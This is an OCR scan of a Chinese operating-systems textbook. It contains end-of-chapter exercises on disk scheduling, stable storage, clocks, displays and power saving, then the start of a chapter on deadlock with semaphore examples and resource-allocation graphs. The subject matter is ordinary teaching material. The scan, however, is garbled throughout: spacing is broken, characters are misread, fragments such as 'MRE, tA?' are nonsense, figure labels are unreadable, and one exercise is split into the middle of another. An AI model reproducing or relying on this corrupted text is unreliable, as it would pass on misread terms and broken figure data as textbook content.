次 序 进 入 磁盘 驱动 器 。 寻 道 时 每 个 柱 面 移动 需 
要 6ms， 以 下 各 算法 所 需 的 寻 道 时 间 是 多 少 ? 
(a) 先 来 先 服务 。 

(b) 最 近 柱 面 优先 。 

(c) 电梯 算法 (初始 向 上 移动 )。 

在 各 情形 下 ， 假 设 磁 劈 起 始 于 柱 面 20。 

. 调度 磁盘 请 求 的 电梯 算法 的 一 个 微小 更 改 是 总 
是 沿 相同 的 方向 扫描 。 在 什么 方面 这 一 更 改 的 
算法 优 于 电梯 算法 ? 

33. 一 位 个 人 电脑 销售 员 向 位 于 阿姆斯特丹 西南 部 
的 一 所 大 学 进行 展示 ， 这 家 电脑 公司 在 提升 
UNIX 系 统 速度 方面 投入 了 巨大 努力 ， 因 而 声称 
他 们 定制 的 UNIX 系 统 速度 很 快 。 他 举例 说 ， 磁 
盘 驱 动 程序 使 用 了 电梯 调度 算法 ， 同 时 对 于 同 
一 柱 面 内 的 多 个 请 求 会 按照 扇 区 顺序 排队 。 
Harry Hacker 同 学 对 销售 员 的 解说 印象 深刻 并 购 
买 了 系统 。Harry 回 到 家 之 后 ， 编 写 并 运行 了 一 
个 随机 读 取 分 布 在 磁盘 上 的 10000 个 块 的 程序 。 
令 他 奇怪 的 是 ， 实 测 的 性 能 表现 与 先 到 先 服务 
算法 的 性 能 相当 。 请 问 是 销售 员 撒谎 了 吗 ? 

-在 讨论 使 用 非 易 失 性 RAM 的 稳定 的 存储 器 时 ， 
掩饰 了 如 下 要 点 。 如 果 稳 定 写 完成 但 是 在 操作 
系统 能 够 将 无 效 的 块 编号 写 人 非 易 失 性 RAM 
之 前 发 生 了 崩溃 ， 那 么 会 有 什么 结果 ?这 一 竞 
争 条 件 会 毁灭 稳定 的 存储 器 的 抽象 概念 吗 ? 请 
解释 你 的 答案 。 
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35. 在 关于 稳定 存储 器 的 讨论 中 ,证 明了 如 果 在 写 


过 程 中 发 生 了 CPU 崩溃 ， 磁 盘 可 以 恢复 到 一 个 
一 致 的 状态 〈 写 操作 或 者 已 完成 ， 或 者 完全 没 
有 发 生 ) 。 如 果 在 恢复 的 过 程 中 CPU 再 次 崩溃 ， 
这 一 特性 是 否 还 保持 ? 请 解释 你 的 答案 。 

.在 关于 稳定 存储 器 的 讨论 中 ， 一 个 关键 假设 是 
当 CPU 崩 种 时 ， 会 导致 一 个 扇 区 产生 错误 的 
ECC。 如 果 这 个 假设 不 成 立 的 话 ， 图 5-27 所 示 
的 5 个 故障 恢复 场景 会 出 现 什 么 问题 吗 ? 

. 某 计 算 机 上 的 时 钟 中 断 处 理 程 序 每 一 时 钟 滴答 
需要 2ms (包括 进程 切换 的 开销 )， 时 钟 以 
60Hz 的 频率 运行 ， 那 么 CPU 用 于 时 钟 处 理 的 
时 间 比 例 是 多 少 ? 

.一 台 计 算 机 以 方 波 模式 使 用 一 个 可 编程 时 钟 。 
如 果 使 用 500MHz 的 晶体 ， 为 了 达到 如 下 时 钟 
分 辩 率 ,存储 寄存 器 的 值 应 该 是 多 少 ? 

(a) lms (每 毫秒 一 个 时 钟 滴答 ) 。 

(b) 100us, i 
.一 个 系统 通过 将 所 有 未 决 的 时 钟 请 求 链接 在 一 
起 而 模拟 多 个 时 钟 ， 如 图 5-30 所 示 。 假 设 当前 
时 刻 是 5000， 并 且 存 在 针对 5008、5012、 
5015、5029 和 5037 时 刻 的 未 决 的 时 钟 请 求 。 请 
指出 在 5000、5005 和 5013 时 刻 时 钟头 、 当 前 时 
刻 以 及 下 一 信号 的 值 。 假设 一 个 新 的 (未 决 的 ) 
信号 在 5017 时 刻 到 来 ， 该 信号 请 求 的 时 间 是 
5033。 请 指出 在 5023 时 刻 ， 时 钟头 、 当 前 时 刻 
以 及 下 一 信号 的 值 。 

.许多 UNIX 版 本 使 用 一 个 32 位 无 符号 整数 作为 
从 时 间 原 点 计算 的 秒 数 来 跟踪 时 间 。 这 些 系统 
什么 时 候 会 溢出 (年 与 月 ) ? 你 认为 这 样 的 事 
情 会 实际 发 生 吗 ? 

.一 个 位 图 模式 的 终端 包含 1600 x 1200 个 像素 。 
为 了 滚动 一 个 窗口 ，CPU (或 者 控制 器 ) 必须 
向 上 移动 所 有 的 文本 行 ， 这 是 通过 将 文本 行 的 
所 有 位 从 视频 RAM 的 一 部 分 复制 到 另 一 部 分 
实现 的 。 如 果 一 个 特殊 的 窗口 高 80 行 宽 80 个 字 
符 (总 共 6400 个 字符 ) ， 每 个 字符 框 宽 8 个 像素 
高 16 像 素 ， 那 么 以 每 个 字 节 50ns 的 复制 速率 滚 
动 整 个 窗口 需要 多 长 时 间 ? 如 果 所 有 的 行 都 是 
80 个 字符 长 ， 那 么 终端 的 等 价 波 特 率 是 多 少 ? 
将 一 个 字符 显示 在 屏幕 上 需要 5us ， 每 种 能够 
显示 多 少 行 ? 
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43. 一 个 用 户 在 终端 上 给 文本 编辑 器 发 出 一 个 命令 


要 求 删除 第 5 行 的 第 7~12 个 字符 (包含 第 12 个 
字符 )。 假 设 命令 发 出 时 光标 并 不 在 第 5 行 ， 请 
问 编 辑 器 要 完成 这 项 工作 需要 发 出 怎样 的 
ANSI 转 义 序列 ? 


.计算 机 系统 的 设计 人 员 期 望 鼠标 移动 的 最 大 速 


率 为 20cm/s。 如 果 一 个 鼠标 步 是 0.1mm， 并 且 每 
个 鼠标 消息 3 个 字 节 ， 假 设 每 个 鼠标 步 都 是 单独 
报告 的 ， 那 么 鼠标 的 最 大 数据 传输 率 是 多 少 ? 


.基本 的 加 性 颜色 是 红色 、 绿 色 和 蓝 色 ， 这 意味 


着 任何 颜色 都 可 以 通过 这 些 颜色 的 线性 县 加 而 
构造 出 来 。 某 人 拥有 一 张 不 能 使 用 全 24 位 颜色 
表示 的 彩色 照片 ， 这 可 能 吗 ? 


. 将 字符 放置 在 位 图 模式 的 屏幕 上 ， 一 种 方法 是 


使 用 BitBlt 从 一 个 字体 表 复制 位 图 。 假 设 一 种 

特殊 的 字体 使 用 16 x 24 像 素 的 字符 ， 并 且 采 用 

RGB 真 彩色 。 

(a) 每 个 字符 占用 多 少 字 体 表 空间 ? 

(b) 如 果 复 制 一 个 字 节 花费 100ns (包括 系统 开销 )， 
那么 到 屏幕 的 输出 率 是 每 秒 多 少 个 字符 ? 


.假设 复制 一 个 字 节 花费 10ns， 那 么 对 于 80 字 符 x 


25 行 文本 模式 的 内 存 映射 的 屏幕 ， 完 全 重 写 屏 
幕 要 花费 多 长 时 间 ? 采用 24 位 彩色 的 1024 x 
768 像 素 的 图 形 屏幕 情况 怎样 ? 


-在 图 5-36 中 存在 一 个 窗口 类 需要 调用 Register- 


Class 进 行 注册 ， 在 图 5-34 中 对 应 的 X 窗 口 代码 
中 ， 并 不 存在 这 样 的 调用 或 与 此 相似 的 任何 调 
用 。 为 什么 ? 


.在 课文 中 我 们 给 出 了 一 个 如 何在 屏幕 上 画 一 个 


和 矩形 的 例子 ， 即 使 用 Windows GDI; 
Rectangle(hdc, xleft, ytop, xright, ybottom); 

是 否 存 在 对 于 第 一 个 参数 (hdc) 的 实际 需 
要 ? MRE, tA? 毕竟 ， 和 矩形 的 坐标 作 
为 参数 而 显 式 地 指明 了 。 


.一 台 瘦 客户 端 用 于 显示 一 个 网 页 ， 该 网 页 包含 


一 个 动画 卡通 ， 卡 通 大 小 为 400 x 160 像 素 ， 以 
每 秒 10 帧 的 速度 播放 。 显 示 该 卡通 会 消耗 
100Mb/s 快 速 以 太 网 带宽 多 大 的 部 分 ? 


.在 一 次 测试 中 ， 一 个 瘦 客 户 机 系统 被 观测 到 对 


于 1Mb/s 的 网 络 工作 良好 。 在 多 用 户 的 情形 中 
会 有 问题 吗 ? 提示 : 考虑 大 量 的 用 户 在 观看 时 
间 表 排 好 的 TV 节目 ， 并 且 相 同 数目 的 用 户 在 


42. 接收 到 一 个 DEL (SIGINT) 字符 之 后 ， 显示 
驱动 程序 将 丢弃 当前 排队 等 修 显示 的 所 有 输 
出 。 为 什么 ? 


浏览 万 维 网 。 
52. 列举 出 瘦 客 户 机 的 两 个 缺点 和 两 个 优点 。 
53. 如 果 一 个 CPU 的 最 大 电压 V 被 前 减 到 V/n， 那 么 
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它 的 功率 消耗 将 下 降 到 其 原始 值 的 1/n*， 并 且 
它 的 时 钟 速度 下 降 到 其 原始 值 的 1/n。 假 设 一 
个 用 户 以 每 秒 1 个 字符 的 速度 键入 字符 ， 处 理 
每 个 字符 所 需要 的 CPU 时 间 是 100ms ，n 的 最 
优 值 是 多 少 ? 与 不 削减 电压 相 比 ， 以 百分比 表 
示 相 应 的 能 量 节 约 了 多 少 ? 假设 空 闪 的 CPU 完 
全 不 消耗 能 量 。 

54. 一 台 笔记 本 电脑 被 设置 成 最 大 地 利用 功率 节省 
特性 ， 包 括 在 一 段 时 间 不 活动 之 后 关闭 显示 器 
和 硬盘 。 一 个 用 户 有 时 在 文本 模式 下 运行 
UNIX 程 序 ， 而 在 其 他 时 间 使 用 X 窗 口 系统 。 
她 惊讶 地 发 现 当 她 使 用 仅 限 文本 模式 的 程序 
时 ， 电 池 的 寿命 相当 长 。 为 什么 ? 

55. 编写 一 个 程序 模拟 稳定 的 存储 器 ， 在 你 的 磁盘 


SF 


上 使 用 两 个 大 型 的 固定 长 度 的 文件 来 模拟 两 块 
磁盘 。 


56. 编写 一 个 程序 实现 三 个 磁盘 臂 调 度 算法 。 编 写 


ny 


一 个 驱动 程序 随机 生成 一 个 柱 面 号 序列 (0 ~ 
999) ， 针 对 该 序列 运行 三 个 算法 并 且 打 印 出 在 ， 
三 个 算法 中 磁盘 臂 需要 来 回 移动 的 总 距离 ( 柱 
面 数 ) 。 

编写 一 个 程序 使 用 单一 的 时 钟 实现 多 个 定时 
器 。 该 程序 的 输入 包含 四 种 命令 (S <int>, T, 
E <int>, P) 的 序列 : S <int> 设 置 当前 时 刻 为 
<int>; T 是 一 个 时 钟 滴答 ，E <int> 调 度 一 个 信 
号 在 <int> 时 刻 发 生 ，P 打 印 出 当前 时 刻 、 下 一 
信号 和 时 钟头 的 值 。 当 唤起 一 个 信号 时 ， 你 的 
程序 还 应 该 打印 出 一 条 语句 。 
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死 锁 








在 计算 机 系统 中 有 很 多 独占 性 的 资源 ， 在 任 一 时 刻 它们 都 只 能 被 一 个 进程 使 用 。 常 见 的 有 打印 机 、 
磁带 以 及 系统 内 部 表 中 的 表 项 。 打 印 机 同时 让 两 个 进程 打印 将 造成 混乱 的 打印 结果 ， 两 个 进程 同时 使 用 
同一 文件 系统 表 中 的 表 项 会 引起 文件 系统 的 瘫 病 。 正 因为 如 此 ， 操 作 系统 都 具有 授权 一 个 进程 (临时 ) 
排他 地 访问 某 一 种 资源 的 能 力 。 

在 很 多 应 用 中 ， 需 要 一 个 进程 排他 性 地 访问 若干 种 资源 而 不 是 一 种 。 例 如 ， 有 两 个 进程 准备 分 别 将 
扫描 的 文档 记录 到 蓝光 光盘 上 。 进 程 A 请 求 使 用 扫描 仪 ， 并 被 授权 使 用 。 但 进程 B 首 先 请 求 蓝光 光盘 刻 
录 机 ， 也 被 授权 使 用 。 现 在 ，A 请 求 使 用 蓝光 光盘 刻录 机 ， 但 该 请 求 在 B 释 放 蓝 光 光 盘 刻 录 机 前 会 被 拒 
绝 。 但 是 ， 进 程 B 非 但 不 放弃 蓝光 光盘 刻录 机 ， 而 且 去 请 求 扫 描 仪 。 这 时 ， 两 个 进程 都 被 阻塞 ， 并 且 一 
直 处 于 这 样 的 状态 。 这 种 状况 就 是 死 锁 (deadlock), 

死 锁 也 可 能 发 生 在 机 器 之 间 。 例 如 ， 许 多 办 公 室 中 都 用 计算 机 连 成 局 域 网 ， 扫 描 仪 、 蓝 光 光 盘 / 
DVD 刻录 机 、 打 印 机 和 磁带 机 等 设备 也 连接 到 局 域 网 上 ， 成 为 共享 资源 ， 供 局 域 网 中 任何 机 器 上 的 人 和 
用 户 使 用 。 如 果 这 些 设备 可 以 远程 保留 给 某 一 个 用 户 〈 比 如 ， 在 用 户 家 里 的 机 器 使 用 这 些 设备 ) ， 那 么 ， 
也 会 发 生 上 面 描 述 的 死 锁 现象 。 更 复杂 的 情形 会 引起 三 个 、 四 个 或 更 多 设备 和 用 户 发 生死 锁 。 

除了 请 求 独占 性 的 MO 设备 之 外 ， 别 的 情况 也 有 可 能 引起 死 锁 。 例 如 ， 在 一 个 数据 库 系统 中 ， 为 了 
避免 竞争 ， 可 对 若干 记录 加 锁 。 如 果 进 程 A 对 记录 R1 加 了 锁 ， 进 程 B 对 记录 R2 加 了 锁 ， 接 着 ， 这 两 个 进 
程 又 试图 各 自 把 对 方 的 记录 也 加 锁 ， 这 时 也 会 产生 死 锁 。 所 以 ， 软 硬件 资源 都 有 可 能 出 现 死 锁 。 

在 本 章 里 ， 我 们 准备 考察 几 类 死 锁 ， 了 解 它们 是 如 何 出 现 的， 学 习 防止 或 者 避免 死 锁 的 办 法 。 尽 管 
我 们 所 讨论 的 是 操作 系统 环境 下 出 现 的 死 锁 问题 ， 但 是 在 数据 库 系 统 和 许多 计算 机 应 用 环境 中 都 可 能 产 
生死 锁 ， 所 以 我 们 所 介绍 的 内 容 实际 上 可 以 应 用 到 包含 多 个 进程 的 系统 中 。 有 很 多 有 关 死 锁 的 著作 ， 
(Operating Systems Review) 中 列 出 了 两 本 参考 书 (Newton, 1979, Zobel, 1983) ， 有 兴趣 的 读者 可 以 参 
考 这 两 本 书 。 死 锁 方面 的 大 多 数 研究 工作 在 1980 年 以 前 就 完成 了 ， 尽 管 所 列 的 参考 文献 有 些 老 ， 但 是 这 
些 内 容 依然 是 很 有 用 的 。 

6.1 资源 

大 部 分 死 锁 都 和 资源 相关 ， 所 以 我 们 首先 来 看 看 资源 是 什么 。 在 进程 对 设备 、 文 件 等 取得 了 排他 性 
访问 权时 ， 有 可 能 会 出 现 死 锁 。 为 了 尽 可 能 使 关于 死 锁 的 讨论 通用 ， 我 们 把 这 类 需要 排他 性 使 用 的 对 象 
称 为 资源 (resource) 。 资 源 可 以 是 硬件 设备 (如 蓝光 驱动 器 ) 或 是 一 组 信息 〈 如 数据 库 中 一 个 加 锁 的 记 
录 )。 通 常 在 计算 机 中 有 多 种 (可 获取 的 ) 资源 。 一 些 类 型 的 资源 会 有 若干 个 相同 的 实例 ， 如 三 台 蓝 光 
驱动 器 。 当 某 一 资源 有 若干 实例 时 ， 其 中 任何 一 个 都 可 以 用 来 满足 对 资源 的 请 求 。 简 单 来 说 ， 资 源 就 是 
随 着 时 间 的 推移 ， 必 须 能 获得 、 使 用 以 及 释放 的 任何 东西 。 


6.1.1 可 抢占 资源 和 不 可 抢占 资源 

资源 分 为 两 类 : 可 抢占 的 和 不 可 抢占 的 。 可 抢占 资源 (preemptable resource) 可 以 从 拥有 它 的 进程 
中 抢占 而 不 会 产生 任何 副作用 ， 存 储 器 就 是 一 类 可 抢占 的 资源 。 例 如 ， 一 个 系统 拥有 256MB 的 用 户 内 存 
和 一 台 打 印 机 。 如 果 有 两 个 256MB 内 存 的 进程 都 想 进行 打印 ， 进 程 A 请 求 并 获得 了 打印 机 ， 然 后 开始 计 
算 要 打印 的 值 。 在 它 没 有 完成 计算 任务 之 前 ， 它 的 时 间 片 就 已 经 用 完 并 被 换 出 。 

然后 ， 进 程 B 开 始 运行 并 请 求 打印 机 ， 但 是 没有 成 功 。 这 时 有 潜在 的 死 锁 危险 。 由 于 进程 A 拥 有 打 
印 机 ， 而 进程 B 占 有 了 内 存 ， 两 个 进程 都 缺少 另外 一 个 进程 拥有 的 资源 ， 所 以 任何 一 个 都 不 能 继续 执行 。 
不 过 ， 幸 运 的 是 通过 把 进程 B 换 出 内 存 、 把 进程 A 换 入 内 存 就 可 以 实现 抢占 进程 B 的 内 存 。 这 样 ， 进 程 A 
继续 运行 并 执行 打印 任务 ， 然 后 释放 打印 机 。 在 这 个 过 程 中 不 会 产生 死 锁 。 
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相反 ， 不 可 抢占 资源 (nonpreemptable resource) 是 指 在 不 引起 相关 的 计算 失败 的 情况 下 ， 无 法 把 
它 从 占有 它 的 进程 处 抢占 过 来 。 如 果 一 个 进程 已 开始 刻 盘 ， 突 然 将 蓝光 光盘 刻录 机 分 配给 另 一 个 进程 ， 
那么 将 划 坏 蓝光 光盘 。 在 任何 时 刻 蓝 光 光 盘 刻 录 机 都 是 不 可 抢占 的 。 

某 个 资源 是 否 可 抢占 取决 于 上 下 文 环境 。 在 一 台 标 准 的 PC 中 ， 内 存 中 的 页 面 总 是 可 以 置换 到 磁盘 
中 并 置换 回来 ， 故 内 存 是 可 抢占 的 。 但 是 在 一 部 不 支持 交换 和 页 面 调度 的 智能 机 上 ， 仅 通过 将 内 存 消耗 
大 户 交 换 出 来 是 不 能 避免 死 锁 的 。 

总 的 来 说 ， 死 锁 与 不 可 抢占 资源 有 关 ， 有 关 可 抢占 资源 的 潜在 死 锁 通常 可 以 通过 在 进程 之 间 重新 分 
配 资源 而 化 解 。 所 以 ， 我 们 的 重点 放 在 不 可 抢占 资源 上 。 

使 用 一 个 资源 所 需要 的 事件 顺序 可 以 用 抽象 的 形式 表示 如 下 : 

1) 请 求 资源 。 

2) 使 用 资源 。 

3) 释放 资源 。 

若 请 求 时 资源 不 可 用 ， 则 请 求 进程 被 迫 等 待 。 在 一 些 操作 系统 中 ， 资 源 请 求 失败 时 进程 会 自动 被 阻 
塞 ， 在 资源 可 用 时 再 唤醒 它 。 在 其 他 的 系统 中 ， 资 源 请 求 失败 会 返回 一 个 错误 代码 ， 请 求 的 进程 会 等 待 
一 段 时 间 ， 然 后 重 试 。 

当 一 个 进程 请 求 资源 失败 时 ， 它 通常 会 处 于 这 样 一 个 小 循环 中 : 请 求 资源 ， 休 眼 ， 再 请 求 。 这 个 进 
程 虽 然 没 有 被 阻塞 ， 但 是 从 各 角度 来 说 ， 它 不 能 做 任何 有 价值 的 工作 ,实际 和 阻塞 状态 一 样 。 在 后 面 的 
讨论 中 ， 我 们 假设 ,如果 某 个 进程 请 求 资源 失败 ， 那 么 它 就 进入 休眠 状态 。 

请 求 资源 的 过 程 是 非常 依赖 于 系统 的 。 在 某 些 系 统 中 ， 提 供 了 request 系 统 调 用 ， 用 于 允许 进程 资 
源 请 求 。 在 另 一 些 系统 中 ， 操 作 系 统 只 知道 资源 是 一 些 特殊 文件 ， 在 任何 时 刻 它们 最 多 只 能 被 一 个 进程 
打开 。 一 般 情况 下 ， 这 些 特殊 文件 用 open 调 用 打开 。 如 果 这 些 文件 正在 被 使 用 ， 那 么 ， 发 出 open 调 用 


的 进程 会 被 阻塞 ， 一 直到 文件 的 当前 使 用 者 关闭 该 文件 为 止 。 


6.1.2 资源 获取 | 

对 于 数据 库 系统 中 的 记录 这 类 资源 ， 应 该 由 用 户 进 程 来 管理 其 使 用 。 
一 种 允许 用 户 管理 资源 的 可 能 方法 是 为 每 一 个 资源 配置 一 个 信号 量 。 这 
些 信 号 量 都 被 初始 化 为 1。 互 斥 信号 量 也 能 起 到 相同 的 作用 。 上 述 的 三 个 
步骤 可 以 实现 为 信号 量 的 down 操 作 来 获取 资源 ， 使 用 资源 ， 最 后 使 用 
up 操作 来 释放 资源 。 这 三 个 步骤 如 图 6-1a 所 示 。 

有 时 候 ， 进 程 需要 两 个 或 更 多 的 资源 ， 它 们 可 以 顺序 获得 dn 
图 6-1b 所 示 。 如 果 需 要 两 个 以 上 的 资源 ， 通 常 都 是 连续 获取 。 

到 目前 为 止 ， 进 程 的 执行 不 会 出 现 问题 。 在 只 有 一 个 进程 参与 时 ， 
所 有 的 工作 都 可 以 很 好 地 完成 。 当 然 ， 如 果 只 有 一 个 进程 ， 就 没有 必要 
这 么 慎重 地 获取 资源 ， 因 为 不 存在 资源 竞争 。 

现在 考虑 两 个 进程 (AMB) 以 及 两 个 资源 的 情况 。 图 6-2 描 述 了 两 
种 不 同 的 方式 。 在 图 6-2a 中 ， 两 个 进程 以 相同 的 次 序 请 求 资源 ， 在 图 6- 
2b 中 ， 它 们 以 不 同 的 次 序 请 求 资源 。 这 种 不 同 看 似 微不足道 ， 实 则 不 然 。 

在 图 6-2a 中 ， 其 中 一 个 进程 先 于 另 一 个 进程 获取 资源 。 这 个 进程 能 
够 成 功 地 获取 第 二 个 资源 并 完成 它 的 任务 。 如 果 另 一 个 进程 想 在 第 一 个 
资源 被 释放 之 前 获取 该 资源 ， 那 么 它 会 由 于 资源 加 锁 而 被 阻塞 ， 直 到 该 
资源 可 用 为 止 。 

图 6-2b 的 情况 就 不 同 了 。 可 能 其 中 一 个 进程 获取 了 两 个 资源 并 有 
效 地 阻塞 了 另外 一 个 进程 ， 直 到 它 使 用 完 这 两 个 资源 为 止 。 但 是 ， 也 





typedef int semaphore; 
semaphore resource _ 1; 


void process_A(void) { 
down(&resource _ 1); 
use_resource _1( ); 
up(&resource _ 1); 

} 


typedef int semaphore; 
semaphore resource_1; 
semaphore resource_2; 


void process_A(void) { 
down(&resource _ 1); 
down(&resource _ 2); 
use_both_resources( ); 
up(&resource _ 2); 
up(&resource _ 1); 


b) 


图 61 使 用 信号 量 保护 资源 : 


引 一 个 资源 ，b) 两 个 资源 


有 可 能 进程 A 获 取 了 资源 1， 进 程 B 获 取 了 资源 2， 每 个 进程 如 果 都 想 请 求 另 一 个 资源 就 会 被 阻塞 ， 那 


么 ， 每 个 进程 都 无 法 继续 运行 。 这 种 情况 就 是 死 锁 。 


这 里 我 们 可 以 看 到 一 个 编码 风格 上 的 细微 差别 〈 哪 一 个 资源 先 获 取 ) 造成 了 可 以 执行 的 程序 和 不 能 
执行 而 且 无 法 检测 错误 的 程序 之 间 的 差别 。 因 为 死 锁 是 非常 容易 发 生 的 ， 所 以 有 很 多 人 研究 如 何 处 理 这 
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种 情况 。 这 一 章 就 会 详细 讨论 死 锁 问 题 ， 并 给 出 一 些 对 策 。 


typedef int semaphore; 
semaphore resource_1; semaphore resource _ 1; 
semaphore resource _ 2; semaphore resource _ 2; 


void process_A(void) { void process_A(void) { 
down(&resource _ 1); down(&resource _ 1); 
down(&resource _ 2); down(&resource _ 2); 
use_both_resources( ); use_both_resources( ); 
up(&resource _ 2); up(&resource _ 2); 
up(&resource _ 1); up(&resource _ 1); 


} } 


void process_B(void) { void process_B(void) { 
down(&resource _ 1); down(&resource _ 2); 
down(&resource _ 2); down(&resource _ 1); 
use_both_resources( ); use_both_resources( ); 
up(&resource _ 2); up(&resource _ 1); 
up(&resource_1); . up(&resource _ 2); 





a) b) 
图 6-2 a) 无 死 锁 的 编码 ，b) 有 可 能 出 现 死 锁 的 编码 


6.2 死 锁 简介 

死 锁 的 规范 定义 如 下 : 如 果 一 个 进程 集合 中 的 每 个 进程 都 在 等 待 只 能 由 该 进程 集合 中 的 其 他 进程 才 
能 引发 的 事件 ， 那 么 ， 该 进程 集合 就 是 死 锁 的 。 

由 于 所 有 的 进程 都 在 等 待 ， 所 以 没有 一 个 进程 能 引发 可 以 唤醒 该 进程 集合 中 的 其 他 进程 的 事件 ， 这 样 ， 
所 有 的 进程 都 只 好 无 限期 等 待 下 去 。 在 这 一 模型 中 ， 我 们 假设 进程 只 含有 一 个 线程 ， 并 且 被 阻塞 的 进程 无 法 由 
中 断 唤醒 。 无 中 断 条 件 使 死 锁 的 进程 不 能 被 时 钟 中 断 等 唤醒 ， 从 而 不 能 引发 释放 该 集合 中 的 其 他 进程 的 事件 。 

在 大 多 数 情 况 下 ， 每 个 进程 所 等 待 的 事件 是 释放 进程 集合 中 其 他 进程 所 占有 的 资源 。 换 言 之 ， 这 一 
死 锁 进 程 集合 中 的 每 一 个 进程 都 在 等 待 另 一 个 死 锁 的 进程 已 经 占有 的 资源 。 但 是 由 于 所 有 进程 都 不 能 运 
行 ， 它 们 中 的 任何 一 个 都 无 法 释放 资源 ， 所 以 没有 一 个 进程 可 以 被 唤醒 。 进 程 的 数量 以 及 占有 或 者 请 求 
的 资源 数量 和 种 类 都 是 无 关 紧 要 的 ， 而 且 无 论 资源 是 何 种 类 型 (软件 或 者 硬件 ) 都 会 发 生 这 种 结果 。 这 
种 死 锁 称 为 资源 死 锁 (resource deadlock) 。 这 是 最 常见 的 类 型 ， 但 并 不 是 唯一 的 类 型 。 本 节 我 们 会 详细 
介绍 一 下 资源 死 锁 ， 在 本 章 末 再 概述 其 他 类 型 的 死 锁 。 


6.2.1 资源 死 锁 的 条 件 

Coffman 等 人 (1971) 总 结 了 发 生 (资源 ) 死 锁 的 四 个 必要 条 件 : 

1) 互 斥 条 件 。 每 个 资源 要 么 已 经 分 配给 了 一 个 进程 ， 要 么 就 是 可 用 的 。 

2) 占有 和 等 待 条 件 。 已 经 得 到 了 某 个 资源 的 进程 可 以 再 请 求 新 的 资源 。 

3) 不 可 抢占 条 件 。 已 经 分 配给 一 个 进程 的 资源 不 能 强制 性 地 被 抢占 ， 它 只 能 被 占有 它 的 进程 显 式 地 释放 。 

4) 环 路 等 待 条 件 。 死 锁 发 生 时 ， 系 统 中 一 定 有 由 两 个 或 两 个 以 上 的 进程 组 成 的 一 条 环 路 ， 该 环 路 中 
的 每 个 进程 都 在 等 待 着 下 一 个 进程 所 占有 的 资源 。 

死 锁 发 生 时 ， 以 上 四 个 条 件 一 定 是 同时 满足 的 。 如 果 其 中 任何 一 个 条 件 不 成 立 ， 死 锁 就 不 会 发 生 。 

值得 注意 的 是 ， 每 一 个 条 件 都 与 系统 的 一 种 可 选 策略 相关 。 一 种 资源 能 否 同时 分 配给 不 同 的 进程 ? 
一 个 进程 能 否 在 占有 一 个 资源 的 同时 请 求 另 一 个 资源 ? 资源 能 否 被 抢占 ? 循环 等 待 环 路 是 否 存在 ? RN 
在 后 面 会 看 到 怎样 通过 破坏 上 述 条 件 来 预防 死 锁 。 


6.2.2 死 锁 建 模 
Holt (1972) 指出 如 何 用 有 向 图 建立 上 述 四 个 条 件 的 模型 。 在 有 向 图 中 有 两 类 节点 : 用 圆 形 表示 
的 进程 ， 用 方形 表示 的 资源 。 从 资源 节点 到 进程 节点 的 有 向 边 代表 该 资源 已 被 请 求 、 授 权 并 被 进程 占用 。 
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在 图 6-3a 中 ， 当 前 资源 R 正 被 进程 A 占 用 。 

由 进程 节点 到 资源 节点 的 有 向 边 表明 当前 进程 正 
在 请 求 该 资源 ， 并 且 该 进程 已 被 阻塞 ， 处 于 等 待 该 资 
源 的 状态 。 在 图 6-3b 中 ， 进 程 B 正 等 待 着 资源 S。 图 6-3c 
说 明 进 入 了 死 锁 状 态 : 进程 C 等 待 着 资源 T， 资 源 T 被 进 
程 D 占 用 着 ， 进 程 D 又 等 待 着 由 进程 C 占 用 着 的 资源 U。 
这 样 两 个 进程 都 得 等 待 下 去 。 图 中 的 环 表示 与 这 些 进 
程 和 资源 有 关 的 死 锁 。 在 本 例 中 ， 环 是 C-TD-U-C。 

我 们 再 看 看 使 用 资源 分 配 图 的 方法 。 假 设 有 三 个 进 
程 (A, B, C) 及 三 个 资源 (R，S，T)。 三 个 进程 对 资 
源 的 请 求 和 释放 序列 分 别 对 应 6-4a 一 图 6-4c。 操 作 系统 


A 


请 求 R 
请 求 S 
释放 R 
释放 S 
a) 
1. A 请 求 R 
3 OOO 
4. A 请 求 S 
a NE 
d) e) 
(a) ©) © 
R] [s] 
h) 
rae 
S AARS Q © 
4.C 请 求 B 
和 
xem [sr] [5] 
k) 1) 
AOO 
[R] Ls] 


0) 


a) 





图 6-3 资源 分 配 图 : a) 占有 一 个 资源 ，b) 请 求 
一 个 资源 ，c) 死 锁 


可 以 随时 选择 任 一 非 阻塞 进程 运行 ， 所 以 它 可 选择 A 运 行 一 直到 A 完 成 其 所 有 工作 ， 接 着 运行 B， 最 后 运行 C。 


B 
请 求 S 
请 求 T 
释放 S 
释放 T 
b) 


WwW 四 © 





p) 


图 6-4 一 个 死 锁 是 如 何 产生 以 及 如 何 避 免 的 例子 


请 求 T 
请 求 R 
释放 T 
释放 R 


[R] [sj E 
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上 述 的 执行 次 序 不 会 引起 死 锁 (因为 没有 资源 的 竞争 ) ， 但 程序 也 没有 任何 并 行 性 。 进 程 在 执行 过 
程 中 ， 不 仅 要 请 求 和 释放 资源 ， 还 要 做 计算 或 者 输入 /输出 工作 。 如 果 进 程 是 串 行 运行 ， 不 会 出 现 一 个 
进程 等 待 O 的 同时 让 另 一 个 进程 占用 CPU 进行 计算 的 情形 。 因 此 ， 严 格 的 串 行 操 作 有 可 能 不 是 最 优 的 。 
不 过 ， 如 果 所 有 的 进程 都 不 执行 IO 操作 ， 那 么 最 短 作 业 优先 调度 会 比 轮转 调度 优越 ， 所 以 在 这 种 情况 
下 ， 串 行 运行 有 可 能 是 最 优 的 。 

如 果 假 设 进程 操作 包含 WO 和 计算 ,那么 轮转 法 是 一 种 合适 的 调度 算法 。 对 资源 请 求 的 次 序 可 能 会 
如 图 6-4d 所 示 。 图 6-4e 一 图 6-4j 是 按 这 个 次 序 执 行 的 相应 的 资源 分 配 图。 在 出 现 请 求 4 后 ， 如 图 6-4h 所 示 ， 
进程 A 被 阻塞 等 待 S， 后 续 两 步 中 的 B 和 C 也 会 被 阻塞 ， 结 果 如 图 6-4j 所 示 ， 产 生 环 路 并 导致 死 锁 。 

不 过 正如 前 面 所 讨论 的 ， 并 没有 规定 操作 系统 要 按照 某 一 特定 的 次 序 来 运行 这 些 进 程 。 特 别 地 ， 对 
于 一 个 有 可 能 引起 死 锁 的 资源 请 求 ， 操 作 系 统 可 以 干脆 不 批准 请 求 ， 并 把 该 进程 挂 起 〈 即 不 参与 调度 ) 
一 直到 处 于 安全 状态 为 止 。 在 图 6-4 中 ， 假 设 操 作 系统 知道 有 引起 死 锁 的 可 能 ， 那 么 它 可 以 不 把 资源 S 分 
